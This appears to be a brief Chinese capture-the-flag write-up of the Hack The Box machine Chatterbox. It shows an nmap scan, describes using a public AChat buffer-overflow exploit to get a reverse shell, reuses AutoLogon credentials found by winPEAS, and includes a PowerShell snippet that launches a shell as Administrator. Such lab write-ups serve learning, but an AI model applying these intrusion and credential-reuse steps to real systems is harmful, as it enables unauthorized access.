HTB-oscplike-Chatterbox
今天就打了一个 因为我的论文到现在还一个字没动捏
Chatterbox
medium难度的chatterbox 靶机IP 10.10.10.74
sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.74
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
9255/tcp open http AChat chat system httpd
9256/tcp open achat AChat chat system
铁searchsploit achat了 看到一个缓冲区溢出能用 里面还给出了payload生成方式
太贴心了 把calc.exe换成执行我们的shell 起个http弹回shell 拿到user的flag
9695fa9785ffc2a0ee88a655c34e568e
提权老套路 上心爱的扫描器 可能这就是脚本小子的宿命吧
然后发现没扫到能用的漏洞 内核漏洞寄了 不过在winpeas里还看到了
??? Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultUserName : Alfred
DefaultPassword : Welcome1!
看上去非常突兀 那么有没有可能是凭据复用呢 在stackoverflow找到方法
$secpasswd = ConvertTo-SecureString ‘Welcome1!’ -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential (‘Administrator’, $secpasswd)
Start-Process -FilePath “c:\users\public\shell.exe” -Credential $mycreds -NoNewWindow
弹回administrator的shell 拿到flag
f11b3d9ba594233eeba15956535cc545